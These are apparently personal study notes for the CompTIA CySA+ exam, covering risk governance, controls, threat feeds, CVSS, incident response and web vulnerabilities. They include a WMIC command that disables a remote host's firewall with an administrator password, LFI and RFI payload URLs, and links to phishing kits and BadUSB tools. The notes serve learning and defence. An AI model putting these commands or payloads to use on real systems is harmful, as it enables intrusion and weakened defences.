CompTIA CySa+ - jdru.dev

Sec+ Expires August 17, 2025 ### 1a Understanding CS leadership concepts #### SANs policy https://www.sans.org/information-security-policy/ #### Service Level Objective SLO: "Cybersecurity service-level objectives (SLOs) are the standards that organizations and their leadership must meet to ensure the security of their network. These objectives help measure and assess how well security operations protect the organization’s assets and assure its customers and stakeholders that systems and data are safe and secure. These objectives must be realistic and achievable, and the organization often reflects the latest security trends and best practices. Some common security-related SLOs include mean time to detect (MTTD), Mean Time to Recover (MTTR), and time to patch. Compliance teams depend upon policy documents and SLOs to measure work performance and conformance. Actionable statements can be extracted from policies and used to determine if work is being performed in a compliant manner. Furthermore, when risk managers identify new risks, the expectation is that governance teams will codify responses designed to address them by updating policy. This entire process is dependent upon the written rules established in policy documents! For example, compliance teams may review patch management activities and report back to risk managers regarding the time between the issuance of a security patch and the time taken to apply it. Risk managers use this data to create a trend report that identifies that “time to patch” has increased steadily over the last several months. In response to this new risk item, risk managers work to determine that several change requests related to security patching had their implementation dates pushed back by department leaders. This information is provided to the governance team, who are responsible for crafting a response. The governance team’s response might be to establish that any requests to delay security patching require two levels of management approval. The governance team would then codify this decision in the existing change management policy, enabling enforcement." #### NIST 4 T's - Risk management Avoid (terminate), Accept (tolerate), Mitigate (treatment), Transfer (transfer) Risks need follow up risks #### Threat modelling Identifying threat actors, and their TTPs ATTACK MITRE Microsoft threat modelling tool ![[Pasted image 20250512105129.png]] Two pronged attack via social engineering. Usually backing up a prompt with a follow up for extra effectiveness. Show forged badged, urgency voice or email and follow up with phone call. Example; email for 250k then, deep fake phone call to encourage authorise payment. Threat modelling requires: knowledge of system components knowledge of attack methods knowledge of appro mitigations knowledge of laws and regulations knowledge of business impacts **Collaboration required** ---------- ### 1b Control types and methods #### categories: technical fw, ips/ids, siem, EDR operational: change control access control managerial/admin :risk assessments #### function: preventive: ACL firewall detective: CCTV, honeypot, SIEM corrective: patch management, backup responsive: SOC CSIRT CSERT compensating: audit external resources: [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf) Security & Privacy Controls for Information Systems and Organisations [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r3.pdf) Protecting Controlled Unclassified Information in Non-federal Systems and Organizations [https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/](https://www.isms.online/information-security/everything-you-need-to-know-about-the-iso-27001-2022-standard-update/) ISO 27001 Standards [https://www.cisecurity.org/controls](https://www.cisecurity.org/controls) CIS Controls #### Managing Attack Surface STIGS Security Technical Implementation Guides - https://public.cyber.mil/stigs/ CIS benchmarks ##### Footprinting Footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system. Methods of footprinting Footprinting is the technique used for gathering information about computer systems and the entities they belong to. To get this information, a hacker might use various tools and technologies. This information is very useful to a hacker who is trying to crack a whole system. https://web-check.as93.net/ https://whoxy.com ##### passive recon Bugbounty reports : https://nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/ ### 1c patch management #### configuration management tools: chef puppet ansible terraform ### 2a threat actor concepts nation-state organised crime hacktivist insider threat script kiddie supply chain access ### 2b id active threats indicators of attack (IoAs), and confidence levels provided by threat information data to identify threats, understand exploits, and reveal an attacker’s activities. UEBA User Entity Behavioural Analysis Information Sharing and Analysis Centers (ISACs) #### Honeypots [https://blueclouddrive.com/generate](https://blueclouddrive.com/generate) Generate your Canarytoken here [https://canarytokens.org/generate](https://canarytokens.org/generate) Canarytokens is a free tool that helps you discover you've been breached by having attackers announce themselves. The tokens allow you to implant traps. [https://www.smokescreen.io/](https://www.smokescreen.io/) Deception technology to blanket your network with decoys to catch the serious bad attackers [https://www.stationx.net/canarytokens/](https://www.stationx.net/canarytokens/) [https://whiteclouddrive.com/generate](https://whiteclouddrive.com/generate) [https://d3fend.mitre.org/](https://d3fend.mitre.org/) #### Exploit databases https://www.exploit-db.com/ #### Threat Feeds - Cybersecurity and Infrastructure Security Agency: https://www.cisa.gov/cybersecurity - NIST Computer Security Resource Center: https://csrc.nist.gov/ - FBI InfraGard: https://www.infragard.org/ - SANS Internet Storm Center: https://isc.sans.edu/ - Virus Total Intelligence: https://www.virustotal.com/gui/intelligence-overview - Cisco Talos Intelligence: https://www.talosintelligence.com/ - SPAMHAUS: https://www.spamhaus.org/ - Crowdstrike: https://www.crowdstrike.com/products/threat-intelligence/ - AlienVault Open Source Threat Exchange: https://otx.alienvault.com/ - Anomali: https://www.anomali.com/products/threatstream - Mandiant: https://www.mandiant.com/advantage/threat-intelligence - Abuse.CH: https://abuse.ch/ ### 3a Reviewing system and network architecture concepts Subkey Name - Description •SAM - Security Accounts Manager (SAM) stores username information for accounts used on the current computer •SECURITY - Linked to the security database of the domain the current user is logged onto •SOFTWARE - Contains settings for software and the Windows operating system •SYSTEM - Contains settings for drivers and file systems •DEFAULT - Contains settings for the LocalSystem account profile Virtualisation: type1 ESXI type2 VirtualBox application virtualisation - thin app containerization includes all necessary components - kernel shared #### Deperimeterisation / Zero - trust https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf SASE IAM, SWB, Zero Trust network access ### 3b Exploring identity and access management Federation - trust another company to manage their account and access our resources OpenID SAML Transitive Trust If A trusts resource B and Resource B trusts Resource C then A Trusts C CASB enable sso enforce rbac, scan malware, monitor and audit user/device activity ### 3c Data loss prevention Remediation is the action the DLP software takes when it detects a policy violation. The following remediation mechanisms are typical: •Alert only—The copying is allowed, but the management system records an incident and may alert an administrator. •Block—The user is prevented from copying the original file but retains access to it. The user may or may not be alerted to the policy violation, but it will be logged as an incident by the management engine. •Quarantine—Access to the original file is denied to the user (or possibly any user). This might be accomplished by encrypting the file in place or by moving it to a quarantine area in the file system. •Tombstone—The original file is quarantined and replaced with one describing the policy violation and how the user can release it again. Public Key Infrastructure Public key infrastructure (PKI) provides a suite of tools designed to support public/private key management, integrity checks via digital signatures, and authentication, as well as non-repudiation of users and/or devices through the use of private key encryption. PKI offers the opportunity to centralize digital certificate standards and the methods used to provide cryptographic services. This is important as it helps improve compliance with established policy and/or regulatory requirements relative to cryptography. PKI provides the mechanisms required to confidently identify the owners of public keys. PKI issues digital certificates guaranteed by a trusted certificate authority (CA). Trusted CAs are preestablished by recording their information within operating system certificate stores, within browsers, and by using special hardware storage components. Digital certificates are foundational to HTTPS traffic. Secure Sockets Layer (SSL) Inspection Secure socket layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection. SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data. SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability. #### Log ingestion • DEBUG: used for debugging purposes • INFO: used for informative messages • WARNING: used to indicate a potential problem ERROR: used to indicate a serious problem • CRITICAL: used to indicate a critical problem ### 4a Process improvement in security operations SIEM and SOAR Playbooks and runbooks MISP:https://www.misp-project.org/ Single pane of glass webhook and API PLugins and apps ### 5a Compliance requirements ISO / NIST, Legal contracts PCI DSS AoC attestation of compliance - doc to demonstrates and org compliance produced by QSA quality security assessor, or Merchant , CMMI Capability Maturity Model Integration (CMMI) Capability Maturity Model Integration (CMMI) describes five levels of maturity within the operational or software capabilities of an organization. Measuring software capabilities is the most common use, and this assessment is frequently required by many federal contracts. A CMMI assessment is very focused on identifying that all work is defined through well-established processes. The results of the assessment will establish the maturity level, or score, of an organization. The scores include the following: • Level 1: Initial—Processes do not exist, and work is reactive in nature. • Level 2: Managed—Many work activities are defined via processes, but work is still frequently reactive in nature. • Level 3: Defined—The majority of work is well defined via processes, and proactive measures are in place. • Level 4: Quantitatively Managed—All work is well defined via processes, proactive measures are in place, and the work outputs are tracked and analyzed. • Level 5: Optimizing—Work is well defined via processes Cloud security alliance STAR - assessment owasp [https://owasp.org/www-project-webgoat/](https://owasp.org/www-project-webgoat/) [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/) Try Hack Me Room Owasp top 10 [https://tryhackme.com/room/owasptop10](https://tryhackme.com/room/owasptop10) Try Hack Me Room Owasp Juice Shop [https://tryhackme.com/room/owaspjuiceshop](https://tryhackme.com/room/owaspjuiceshop) [https://owasp.org/www-community/Vulnerability_Scanning_Tools](https://owasp.org/www-community/Vulnerability_Scanning_Tools) [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/) [https://owasp.org/www-project-proactive-controls/](https://owasp.org/www-project-proactive-controls/) [https://github.com/OWASP/wstg/tree/master/document](https://github.com/OWASP/wstg/tree/master/document) OWASP Testing guide very extensive [https://owasp.org/www-project-web-security-testing-guide/](https://owasp.org/www-project-web-security-testing-guide/) GDPR latest changes: Preparing for 2025: Key Compliance Areas for Businesses - UK GDPR: UK and EU compliance 2025 1. Legitimate Interest Assessments (LIAs) •Integral to data processing under UK and EU GDPR. •Conduct LIAs reflecting nuanced differences post-Brexit. •Key components of an LIA: •Clearly outline the legitimate interest. •Demonstrate necessity of data processing. •Prove data subject’s rights do not override these interests. •Regularly review LIAs to align with regulatory updates. • 2. Data Transfer Impact Assessments (DTIAs) •Essential for cross-border data transfers post-Brexit. •Evaluate protections for personal data transferred outside UK/EU. •Consider frameworks like the Data Privacy Framework for UK-US transfers. •Stay prepared for potential legal status changes. • 3. Data Protection by Design and Default • Integrate data privacy measures into all business processes. • Conduct regular Data Privacy Impact Assessments (DPIAs) for high-risk activities. • Ensure only necessary data is processed and access is limited. • Align activities with GDPR principles. • 4. Maintaining Records of Processing Activities (RoPAs) •Mandatory for significant or high-risk data processing. •Provide a clear picture of the data lifecycle. •Regularly update RoPAs to reflect evolving guidelines. ### 5b Understanding vuln scanning methods Dynamic analysis includes using vulnerability scanning software to identify vulnerabilities and, in a more vigorous approach, penetration testing. A dynamic analysis approach requires evaluation of a system or software while it is running. Evaluation tasks may be manual interactions with the features and functions that comprise the system, application, or interactions that leverage the power of specialized tools; for example, using Burp Suite to carefully observe, control, and/or manipulate the data moving between the browser and application. ### 5c Exploring Special considerations in Vuln scanning Operational technology (OT) ICSs, SCADA, PLC supervisory control and data acquisition (SCADA) system takes the place of a control server in large-scale, multiple-site ICSs. SCADA typically run as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. SCADA typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices. ### 6a Understanding Vulnerability Scoring Concepts SCAP CVSSS VULN VALIUDATION CONTEXT #### SCAP languages Security Content Automation Protocol defined by STIG https://public.cyber.mil/stigs/scap/ standardise identification for flaws in software, misconfig, and vulns OVAL Open vuln and assessment language Consistent interpration of vulns ARF Asset reporting format -[https://oval.mitre.org/](https://oval.mitre.org/) info about assets XCCDF Extensible configuration checklist description format - https://csrc.nist.gov/files/pubs/ir/7275/r4/upd1/final/docs/nistir-7275r4_updated-march-2012_clean.pdf Benchmarks #### SCAP id schemes CPE - Common Platform Enumeration URI like id for software and software CVE - Common vuln and exposure CCE - configuration CVSS scoring > [!NOTE] 4 approx. questions on exam for CVSS > Calculate CVSS score ##### CVSS v2, v3, v4 https://www.first.org/cvss/ score from 0 - 10 0 None 0.1+ Low 4.0+ Medium 7.0+ High 9.0+ Critical ###### CVSS Metrics v3.1 Attack Vector (AV) Physical (P), Local (L), Adjacent network (A), or Network (N) The physical attack vector includes physical access to the system, such as accessing the device in person. The local attack vector consists of the ability to manipulate the system with local access, such as by using a USB-connected device. The network attack vector includes two distinct categories: adjacent network and network. Network (N) describes access via the same broadcast domain, whereas Adjacent network (A) refers to connectivity from any location. Network attacks include access to a system via the network, and include actions such as sending malicious data packets or instructions. The attack vectors help organizations identify the best way to implement protections. Attack Complexity (AC) High (H) or Low (L) Refers to the difficulty of the attack techniques used by a threat actor. Low indicates a straightforward attack, and high indicates a more complicated attack. Attack complexity is important to consider when evaluating the risk posed by a vulnerability. If the attack complexity is high, it may be difficult or impossible for a threat actor to exploit the vulnerability, thus reducing the risk. On the other hand, if the attack complexity is low, the risk posed by the vulnerability is greater. Privileges Required (PR) None (N), Low (L), or High (H) This represents permissions such as guest or anonymous (N), standard user (L), and administrator (H). User Interaction (UI) None (N) or Required (R) Whether an exploit of the vulnerability depends on some local user action, such as executing a file attachment. Scope (S) Unchanged (U) or Changed (C) This indicates whether the exploit affects only the local security context (U) or not (C). For example, a hypervisor vulnerability might allow an exploit from one VM to other VMs. Confidentiality (C), Integrity (I), and Availability (A) High (H), Low (L), or None (N) Where the metrics above assess exploitability, these three separate metrics measure impacts to the CIA triad. ### 7A effective communication concepts #### Vuln management reporting org aware of risks of IT infrastructure Simple summaries of existing vulnerabilities details remediation steps #### Regulatory compliance reports Prepared by qualified personnel and often include information on policies and procedures #### internal compliance reports include assessments of endpoints to validate configuration pre required baselines #### KPI Incidents, detection times, indicators of compromise, threats, risk assessment, resource allocations cons: incidents are subjective, fps, inaccurate cs landscape data, irrelevant data, KPI based decision-making is complicated. #### SLO customer oriented operations - provide benchmark by which security operations can measure their performance ### 7b vuln reporting outcomes and action plans establish policies training compensating controls #### MoU Memorandum of Understanding is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement’s objectives and each party’s duties and responsibilities. #### SLA legally binding contract between parties ### 8a understand incident response activities Plan, guidelines, resources, protocols, minimise impact prep, detection/analysis, contain, eradicate/recovery, post-incident policies - systems of org expectation and procedures for responding to security incidents procedures - orgs actions during incident response assessment of potential impacts - risk analyses and impact measure scope of identified incidents Playbooks: https://www.gov.scot/publications/cyber-resilience-incident-management/ Communication Plan - A secure method of communication between the IR team members is essential for successfully managing incidents. The team may require “out-of-band” or “off-band” channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally, the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment. #### Tabletop exercise resource https://www.ncsc.gov.uk/section/exercise-in-a-box/overview [https://www.thecyberfish.com/](https://www.thecyberfish.com/) [https://circadence.com/](https://circadence.com/) https://irgame.ai/ #### post incident lesson learned report (LLR) or after-action report (AAR). #### BCDR Business continuity and Disaster recovery BC keep business running DR part of DR and immediate efforts ### 8b perform incident response activities #### Forensics chain of custody identification collection analysis reporting/presentation legal hold - keep data pending legal case eDiscovery - email logs text voicemail discovered via legal hold immediate impact -fines costs of assets ### 9a understanding incident response comms persons group or org that can affect or be affected by an particular incident Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences. ### 9b analysing incident response activates autopsy analyse forensic image: [Autopsy - Digital Forensics](https://www.autopsy.com/) ### 10a Identifying malicious activity pcap samples domains https://www.whoxy.com/ ### 10b attack methodology frameworks Security Testing: https://www.isecom.org/OSSTMM.3.pdf killchain weaponisation delivery, exploit, installation, cc, actions diamond model - analyse an intrusion event ![[Pasted image 20250515112908.png]] `E = { {Adversary,Cadversary}, `{Capability,Ccapability},` `{Infrastructure,Cinfrastructure},` `{Victim,Cvictim} = { {IP,Cip},` `{Port,Cport},` `{Process,Cprocess} },` `{Timestamp,Ctimestamp},` `{ ... } }` ![[Pasted image 20250515113046.png]] ![[Pasted image 20250515113123.png]] #### Maltego Visualisation alternative: https://github.com/HuronOsint/OsintDistro%C2%A0In ### 12a analysing web vulns burp suite OWASP ZAP zed attack proxy [https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/](https://www.zaproxy.org/docs/guides/zapping-the-top-10-2021/) Nikto - web scanner https://www.cirt.net/Nikto2 Arachni - web scanner (new name : SCNR) [GitHub - Arachni/arachni: Web Application Security Scanner Framework](https://github.com/Arachni/arachni?tab=readme-ov-file) [Ecsypno Single Member P.C. – R&D and Consulting](https://ecsypno.com/) Immunity Debugger - analysis reverse engineer software GNU Debugger - analysis reverse engineer software ### 12b analyse cloud vulns ScoutSuite - audit tool github.com/nccgroup/ScoutSuite Prowler -audit tool github.com/toniblyx/prowler Pacu - exploit framework github.com/RhinoSecurityLabs/pacu rhinosecuritylabs.com/aws/cloudgoat-vulnerable-design-awsenvironment) ### 13a understanding scripting languages ksh unix ibm sh - bourne shell csh - c shell nuix oracle tcsh - C shell improved c shell bash - bourne again shell improved sh zsh - z shell expands on bash shell ##### Common: cat Display the content of a file. tail Display the last 10 lines of a file. head Display the first 10 lines of a file. touch Create an empty file. mkdir Create a directory. cp Copy a file (or directory). mv Move an object, such as a file. Also used to rename files and directories. rm Remove a file or directory. file Determine the type of a file. ls Display the contents of a directory. locate Search for files. Locate uses a database to improve speed and efficiency of searches. find Search for files by parsing the file system. wget Simple command to retrieve content from an HTTP server. curl Similar to wget but includes more sophisticated options. ###### admin: vi/vim A file editor for use in a terminal. Very popular but nonintuitive to use. su Substitute or switch user. sudo Precedes a command that requires elevated privileges. useradd Create a user account usermod Change the attributes of a user account. chmod Change the read, write execute attributes of a file or directory. chown Change permissions on a file or directory. mkfifo Similar in concept t ###### arithmatic: '+ Addition '- Subtraction '* Multiplication / Division % Modulus ##### operators: == Is equal to != Is not equal to -eq Alternative form of “is equal to” -ne Alternative form of “is not equal to” -gt Greater than -lt Less than -ge Greater than or equal to -le Less than or equal to #### Powershell #### WMIC Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely. The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is process call create which allows an authenticated user to start a command on a remote host. This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall: wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off" #### Python #### RegEx #### JSON #### XML ### 13b id malicious activity through analysis Event - Description Unusual network traffic - This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity. Unexpected files or processes - This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system. Unexpected communication - This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data. Communication with suspicious IP addresses - This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks. Unusual communication protocols - This can include unusual communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel. Large data transfers - This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data. Communication during unusual times - This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection. Communication with suspicious domains - This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered. Encrypted communication - This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel. ### 14a exploring secure software dev practices SSDLC NIST Secure Software Development Framework - https://csrc.nist.gov/Projects/ ssdf Synopsis Secure SDLC 101 - https://www.synopsys.com/blogs/software-security/ secure-sdlc/ Microsoft SDL Practices - https://www.microsoft.com/en-us/securityengineering/ sdl/ Palo Alto: What Is Secure Software Development Lifecycle (Secure SDLC)? - https://www.paloaltonetworks.com/cyberpedia/what-is-secure-softwaredevelopment-lifecycle OWASP testing guide https://owasp.org/www-project-web-security-testing-guide/ Auth attack on-path password spray cred stuff ### 14b recommending controls to mitigate successful app attacks The heap is an area of memory allocated by the application during execution to store a variable. The heap can be used to store larger amounts of data than the stack, and variables are globally accessible to the process. A heap overflow can overwrite those variables and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft’s GDI+ processing of JPEG images https://kb.cert.org/vuls/id/297462. Also, management of objects in the heap is dependent on the process that created the object. Failing to de-allocate memory can cause a memory leak. An integer overflow is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. This can cause the program to behave unpredictably, resulting in a security vulnerability if the overflowed value is used in a sensitive calculation or security check. Buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system. #### LFI In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server’s file structure and executes a file. As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to bypass security mechanisms that automatically add a .php suffix to the request. This enables the attacker to access non-PHP files: /webpage.php?FONT=../../Windows/system32/cmd.exe%00 #### RFI In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. An attacker could, for instance, force a parameter in a web page to call an external malicious link which includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn’t one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file: /webpage.php?FONT=http://www.malice.foo/malware.php ### SSRF Server-side request forgery (SSRF) describes a type of web application security vulnerability that occurs when an attacker can send unauthorised requests from a vulnerable web application to other internal or external systems to gain unauthorised access. SSRF typically involves an attacker exploiting the web application’s ability to send HTTP requests to other systems, which are then abused to instruct “hidden” internal or external systems to provide the attacker with access to protected features or to steal information. https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Demo https://www.hacksplaining.com/exercises/ssrf & PortSwigger (the maintainers of Burp Suite) have published an excellent technical overview of SSRF. https://portswigger.net/web-security/ssrf A well-documented example of SSRF occured in the 2019 CaptialOne breach. https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/ Some common techniques used to exploit SSRF vulnerabilities include the following: §An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet. §An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems. §An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks. To prevent SSRF vulnerabilities, web application developers should consider the following: §Always validate user input—Ensure that all user input is properly validated and sanitised to prevent attackers from manipulating requests. §Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default. §Firewall and network segmentation—Network segmentation can prevent unauthorised access to internal systems when combined with firewalls to block traffic from unauthorised sources. §Secure coding practices—Developers should follow secure coding practices, such as using well established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings. ### Data poisoning Data poisoning is an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results. Some strategies designed to mitigate the risk of data poisoning attacks include the following: §Data Validation—Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack. §Data Diversity—Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results. §Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack. §Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning. §Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks. Data Poisoning Examples §Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon’s Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real world scenarios. §Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location’s data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether. Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users’ inboxes without being flagged as spam ### 14c Implementing Controls to Prevent Attacks ![[Pasted image 20250516134011.png]] --- portswigger labs https://portswigger.net/web-security/all-labs# Hacksplaining [Lessons](https://www.hacksplaining.com/lessons) phishing [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) and Gophish [https://getgophish.com/](https://getgophish.com/). The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking web page or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns. [https://surbl.org/](https://surbl.org/) Intelligence and reputation services covering spam and abuse sites, phishing, malware, and cracked sites. [https://dnstwist.it/](https://dnstwist.it/) Phishing domain scanner. Wondering if threat actors created phishing domains to masquerade as an online service or property? Search the original domain or brand name etc. [https://github.com/0xDanielLopez/phishing_kits](https://github.com/0xDanielLopez/phishing_kits) Exposing phishing kits seen from [phishunt.io](http://phishunt.io/) [https://github.com/hasanfirnas/symbiote](https://github.com/hasanfirnas/symbiote) Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. By requesting camera permission on the victim's device, this script can take pictures covertly. [https://easydmarc.com/tools/phishing-url](https://easydmarc.com/tools/phishing-url) Phishing Link (URL) & email checker [https://github.com/mitchellkrogza/Phishing.Database](https://github.com/mitchellkrogza/Phishing.Database) Phishing Domains, URLs websites and threats database. [https://isitphishing.org/](https://isitphishing.org/) Type what you want to test for phishing [https://www.ncsc.gov.uk/collection/phishing-scams](https://www.ncsc.gov.uk/collection/phishing-scams) [https://openphish.com/phishing_activity.html](https://openphish.com/phishing_activity.html%C2%A0) ; [https://phishing.army/](https://phishing.army/) blocklists [https://phishcheck.me/](https://phishcheck.me/) Find out what's lurking behind that URL. [https://phishunt.io/](https://phishunt.io/) Active websites that are suspicious of being phishing. [https://phishing-initiative.eu/contrib/](https://phishing-initiative.eu/contrib/) Verify or report a website. [https://www.phishlabs.com/blog/ -](https://www.phishlabs.com/blog/%C2%A0-) threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list. [https://phishstats.info/](https://phishstats.info/) [https://phishtank.org/index.php](https://phishtank.org/index.php) PhishTank is a collaborative clearing house for data and information about phishing on the Internet. Alternative site [https://www.phishtank.com/](https://www.phishtank.com/) [https://www.phishlabs.com/blog/](https://www.phishlabs.com/blog/) - threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list. [https://www.phishtank.com/](https://www.phishtank.com/%C2%A0) ; [https://www.phishtool.com/](https://www.phishtool.com/) [https://threatcop.com/phishing-url-checker](https://threatcop.com/phishing-url-checker) [Should I Block It?](https://shouldiblockit.com/) https://www.nirsoft.net/ https://start.me/p/ydqwxP/rss-feeds https://youtu.be/W8HG3sLsp8Y [https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/](https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/) •[https://www.tindie.com/products/aprbrother/evil-crow-cable/](https://www.tindie.com/products/aprbrother/evil-crow-cable/) •[https://www.wallofsheep.com/pages/juice (juice](https://www.wallofsheep.com/pages/juice%C2%A0\(juice) jacking) •[https://zsecurity.org/product/badusb-keystroke-injection-cable/](https://zsecurity.org/product/badusb-keystroke-injection-cable/) •[https://twitter.com/androidmalware2/status/1679110865331576833 Bruteforcing](https://twitter.com/androidmalware2/status/1679110865331576833%C2%A0Bruteforcing) PIN protection of popular app using $3 ATTINY85 •[https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/](https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/) •[https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9](https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9) •[http://www.airdrivewifi.com/](http://www.airdrivewifi.com/) •[https://counterespionage.com/malicious-usb-cables/](https://counterespionage.com/malicious-usb-cables/) •[https://dstike.com/products/dstike-wifi-deauther-mini](https://dstike.com/products/dstike-wifi-deauther-mini) •[https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0](https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0) if link does not work then search for digispark on eBay •[https://en.rattibha.com/thread/1827621860193763785](https://en.rattibha.com/thread/1827621860193763785) SPY GADGETS •[https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4](https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4) •[https://flipperzero.one/](https://flipperzero.one/) •[https://greatscottgadgets.com/hackrf/](https://greatscottgadgets.com/hackrf/) •[https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device](https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device) •[https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910](https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910) •[https://hak5.org/](https://hak5.org/) 